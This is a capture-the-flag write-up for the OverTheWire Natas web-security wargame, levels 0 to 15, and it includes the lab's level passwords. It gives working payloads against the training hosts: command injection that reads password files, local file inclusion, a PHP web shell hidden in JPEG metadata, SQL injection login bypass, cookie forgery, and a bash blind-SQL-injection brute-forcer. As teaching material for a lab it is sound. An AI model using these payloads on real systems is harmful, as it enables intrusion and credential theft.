Solutions of NATAS 1-15

Hello Folks,

In this post, I will share with you the solutions of Natas challenges from one to fifteen. It is strongly recommended not to look at the solutions without cogitating.

Natas0:

Username and password have been already provided for Natas0.

URL: http://natas0.natas.labs.overthewire.org

natas0/natas0

Solution:

Login the page with the credential natas0/natas0.

On Chrome Browser right-click and “View page source”

Password for natas1 is : gtVrDuiDfck831PqWsLEZy5gyDz1clto

Natas1:

URL: http://natas1.natas.labs.overthewire.org/

Solution:

Login the page with the credential that you got from the natas0.

In this challenge you can not do right-clicking, instead you should use F12 shortcut function key to open Web developer tools. And the select Elements tab.

Password for natas2 is : ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

 

Natas2:

URL: http://natas2.natas.labs.overthewire.org

Solution:

Login the page with the credential that you got from the natas1.

On Chrome Browser right-click and “View page source”

Actually it is not obvious, but we have a hint from the tag <img src=”files/pixel.png”>

<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

Let’s make a request for the URL http://natas2.natas.labs.overthewire.org/files/

You can see the file users.txt, which holds the number of users’ credentials.

Password for natas3 is : sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

Natas3:

URL: http://natas3.natas.labs.overthewire.org

For this challenge, we should have basic understanding of robots.txt which is a Robots Exclusion Protocol, which indicates whether certain user agents (web-crawling software) can or cannot crawl parts of a website. These crawl instructions are specified by “disallowing” or “allowing” the behavior of certain (or all) user agents. For more information here.

Solution:

Login the page with the credential that you got from the natas2 and “View Page Source” on Google Chrome.

 

Let’s make request to URL http://natas3.natas.labs.overthewire.org/robots.txt

As it indicated in the introduction which tells the all user agents(all crawlers) not to access and index contents of the folder s3cr3t. If we make another request for the URL http://natas3.natas.labs.overthewire.org/s3cr3t/ you will see users.txt

Password for natas4 is: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4:

URL: http://natas4.natas.labs.overthewire.org

To solve this challenge you need to have basic understanding of  de-facto HTTP request headers. For this challenge, our solution is Referer header.

Solution:

Referer is an HTTP header field that identifies the address of the webpage (i.e. the URI or IRI) that linked to the resource being requested. By checking the referrer, the new webpage can see where the request originated.(Wikipedia)

curl -v -H "Referer: http://natas5.natas.labs.overthewire.org/"  -u  natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ http://natas4.natas.labs.overthewire.org

Password for natas5 is : iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5:

URL: http://natas5.natas.labs.overthewire.org

When we send a web request to web server via curl, Web server sends  a Set-Cookie header to the user agent. And with every request user agent will send back all previously stored cookies to the server with Cookie: header.

curl -v -u "natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" http://natas5.natas.labs.overthewire.org/
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:09:16 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=0
< Vary: Accept-Encoding
< Content-Length: 855
< Content-Type: text/html; charset=UTF-8
< 

Solution:

There is no clear answer of this challenge. I just guessed it and modify the Cookie by setting the Cookie: loggedin=1

curl -v -H "Cookie: loggedin=1" -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq "http://natas5.natas.labs.overthewire.org"
* About to connect() to natas5.natas.labs.overthewire.org port 80 (#0)
*   Trying 176.9.9.172...
* Connected to natas5.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas5'
> GET / HTTP/1.1
> Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
> User-Agent: curl/7.29.0
> Host: natas5.natas.labs.overthewire.org
> Accept: */*
> Cookie: loggedin=1
> 
< HTTP/1.1 200 OK
< Date: Sat, 24 Nov 2018 14:11:43 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: loggedin=1
< Vary: Accept-Encoding
< Content-Length: 890
< Content-Type: text/html; charset=UTF-8
< 
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
<strong>Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</strong></div>
</body>
</html>
* Connection #0 to host natas5.natas.labs.overthewire.org left intact

Password for the natas6 is : aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6:

URL: http://natas6.natas.labs.overthewire.org

When we check the source code. It compares the value of the $secret with the value of the input element. If both values are equal, password for natas7 will be printed.

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

Solution: 

The include statement includes and evaluates the specified file.(php Manual).  Let’s try to access the include/secret.inc file by making a web request. URL http://natas6.natas.labs.overthewire.org/includes/secret.inc

As you see value of $secret variable is FOEIUWGHFEEUHOFUOIU. if you put this value to input form and submit the form.

 

 

Password for natas7 is: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7:

URL: http://natas7.natas.labs.overthewire.org

Solution:

Web pages are rendered by the value of $_REQUEST[‘page’]. As an example . http://natas7.natas.labs.overthewire.org/index.php?page=about (To render about page.)

What if we set the page value to/etc/natas_webpass/natas8 ? So our URL will be http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

 

 

 

Password for natas8 is: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8:

URL: http://natas8.natas.labs.overthewire.org

We need to simple reverse engineering to solve this challenge. Key thing is the function encodeSecret()

We must put a value into the input form that function yields us the value 3d3d516343746d4d6d6c315669563362

 

Solution:

You can use the URL https://repl.it/repls/SoftElegantPublishers  for your php sandbox.

<?php

echo base64_decode((strrev(hex2bin("3d3d516343746d4d6d6c315669563362"))));

//oubWYf2kBq
?>

 

If you put the value oubWYf2kBq into the input secret you will get the password for natas9.

 

Password for natas9 is: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9:

URL: http://natas9.natas.labs.overthewire.org

Solution:

Running multiple commands by separating semicolon(;).

ls;cat /etc/natas_webpass/natas10

Password for natas10 is: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10:

URL: http://natas10.natas.labs.overthewire.org

Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

Solution: 

If you check the snipped of code above some of the special characters checked by the preg_match() php funtion. We need to bypass this check somehow.

Solution1: .* cat /etc/natas_webpass/natas11

Solution2: Using the URL Encoding code to escaping the preg_match() function.

http://natas10.natas.labs.overthewire.org/index.php?needle=pass%0A%20cat%20/etc/natas_webpass/natas11&submit=Search

.htaccess:AuthType Basic
.htaccess: AuthName "Authentication required"
.htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
.htaccess: require valid-user
.htpasswd:natas10:$1$XOXwo/z0$K/6kBzbw4cQ5exEWpW5OV0
.htpasswd:natas10:$1$mRklUuvs$D4FovAtQ6y2mb5vXLAy.P/
.htpasswd:natas10:$1$SpbdWYWN$qM554rKY7WrlXF5P6ErYN/
/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Password for natas11 is: U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Natas11:

URL: http://natas11.natas.labs.overthewire.org/

<?

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
    $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
    $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
    if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
        if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
        $mydata['showpassword'] = $tempdata['showpassword'];
        $mydata['bgcolor'] = $tempdata['bgcolor'];
        }
    }
    }
    return $mydata;
}

function saveData($d) {
    setcookie("data", base64_encode(xor_encrypt(json_encode($d))));
}

$data = loadData($defaultdata);

if(array_key_exists("bgcolor",$_REQUEST)) {
    if (preg_match('/^#(?:[a-f\d]{6})$/i', $_REQUEST['bgcolor'])) {
        $data['bgcolor'] = $_REQUEST['bgcolor'];
    }
}

saveData($data);



?>

 

Solution: Logic of XOR Encryption

If you check the source code and the server responses, you realize that  you know the cipher and plain text, so we can extract the xor_encryption key for this challenge.

Plain Text  XOR Key = Cipher Text

Cipher Text XOR Plain Text = Key

tesla@otuken:~$ curl -v -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK http://natas11.natas.labs.overthewire.org/
*   Trying 176.9.9.172...
* TCP_NODELAY set
* Connected to natas11.natas.labs.overthewire.org (176.9.9.172) port 80 (#0)
* Server auth using Basic with user 'natas11'
> GET / HTTP/1.1
> Host: natas11.natas.labs.overthewire.org
> Authorization: Basic bmF0YXMxMTpVODJxNVRDTU1ROXh1Rm9JM2RZWDYxczdPWkQ5SktvSw==
> User-Agent: curl/7.58.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Date: Tue, 27 Nov 2018 17:41:41 GMT
< Server: Apache/2.4.10 (Debian)
< Set-Cookie: data=ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw%3D
< Vary: Accept-Encoding
< Content-Length: 1085
< Content-Type: text/html; charset=UTF-8

cipher is: ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw

<?php
$data=array( "showpassword"=>"no", "bgcolor"=>"#ffffff");
echo (json_encode($data));
?>

Result:

{"showpassword":"no","bgcolor":"#ffffff"}

Let’s use  {“showpassword”:”no”,”bgcolor”:”#ffffff”} as our key.

 

 

Key is: qw8J

 

Encrypted cookie for showing password is:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK

 

curl -u natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK --cookie "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK" http://natas11.natas.labs.overthewire.org

 

 

Password for natas12 is: EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3

Natas12:

URL: http://natas12.natas.labs.overthewire.org/

1- Install exiftool.

2- Create a very small jpg image which is less than 1KiB and name it white.jpg (small white background is enough)

3- Next step is injecting malicious php code inside the white.jpg by using exiftool.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas13'); ?>" white.jpg

 

tesla@otuken:~/Downloads$ exiftool white.jpg
ExifTool Version Number         : 10.80
File Name                       : white.jpg
Directory                       : .
File Size                       : 917 bytes
File Modification Date/Time     : 2018:11:27 22:11:00+04:00
File Access Date/Time           : 2018:11:27 22:11:00+04:00
File Inode Change Date/Time     : 2018:11:27 22:11:00+04:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Exif Byte Order                 : Big-endian (Motorola, MM)
Document Name                   : <?php system('cat /etc/natas_webpass/natas13'); ?>
X Resolution                    : 1
Y Resolution                    : 1
Resolution Unit                 : None
Y Cb Cr Positioning             : Centered
Image Width                     : 51
Image Height                    : 51
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 51x51
Megapixels                      : 0.003

 

4- Open the browser and make web request to http://natas12.natas.labs.overthewire.org/

5- Open browser’s “Developer tools.” and the remove the type=”hidden” tag

6- And modify the suffix from jpg to php.

7- Click the link of the uploaded file. it will be interpret by the php.

 

 

 

Password for natas13 is: jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Natas13: 

URL: http://natas13.natas.labs.overthewire.org

You can use the same method as we did on natas12. Only thing you have to do is changing the file.

exiftool -documentname="<?php system('cat /etc/natas_webpass/natas14'); ?>" white.jpg

 

 

Password for natas14 is: Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Natas14:

URL: http://natas14.natas.labs.overthewire.org

 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas14', '<censored>'); 
    mysql_select_db('natas14', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    if(mysql_num_rows(mysql_query($query, $link)) > 0) { 
            echo "Successful login! The password for natas15 is <censored><br>"; 
    } else { 
            echo "Access denied!<br>"; 
    } 
    mysql_close($link); 
} else { 
?>

Solution:

username > ” or “1”=”1

password > ” or “1”=”1

 

Password for natas15 is: AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Natas15:

<? 

/* 
CREATE TABLE `users` ( 
  `username` varchar(64) DEFAULT NULL, 
  `password` varchar(64) DEFAULT NULL 
); 
*/ 

if(array_key_exists("username", $_REQUEST)) { 
    $link = mysql_connect('localhost', 'natas15', '<censored>'); 
    mysql_select_db('natas15', $link); 
     
    $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\""; 
    if(array_key_exists("debug", $_GET)) { 
        echo "Executing query: $query<br>"; 
    } 

    $res = mysql_query($query, $link); 
    if($res) { 
    if(mysql_num_rows($res) > 0) { 
        echo "This user exists.<br>"; 
    } else { 
        echo "This user doesn't exist.<br>"; 
    } 
    } else { 
        echo "Error in query.<br>"; 
    } 

    mysql_close($link); 
} else { 
?> 

//omitted...

Solution:

My first guess to solve this challenge was the into outfile statement. Unluckily, I do not have permission to create a file. For more information check secure_file_priv option of mysql server.

Example:

select * from users where username=”natas16″ into outfile “/var/www/html”

After three days of trying other methods. I stuck on this challenge. So, I had to get some hint. Hint was the “Blind Sql Injection”. After red over some pages in the blogs, I understand the logic and create my own solution to find the password. Basically script does brute-force by trying all the alphabets(uppercase, lowercase) and numbers.

 

#!/bin/bash

letters=""
for i in {a..z}
do
	letters+=$i
done

for i in {A..Z}
do
	letters+=$i
done

for i in {0..9}
do
	letters+=$i
done
#################################################################
echo $letters
echo ""
echo ""

key=""


for count in {1..40}
do
for (( i=0; i<${#letters}; i++ )); do
  letter="${letters:$i:1}"
	curl -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J "http://natas15.natas.labs.overthewire.org/index.php?debug&username=natas16%22%20%20and%20password%20like%20binary%20%22$key$letter%" | grep -i "This user exist."
	if [ $? -eq 0 ] ; then
		key+=$letter
	fi
done
done
echo "key is: $key"

 

 

Password for natas16 is: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh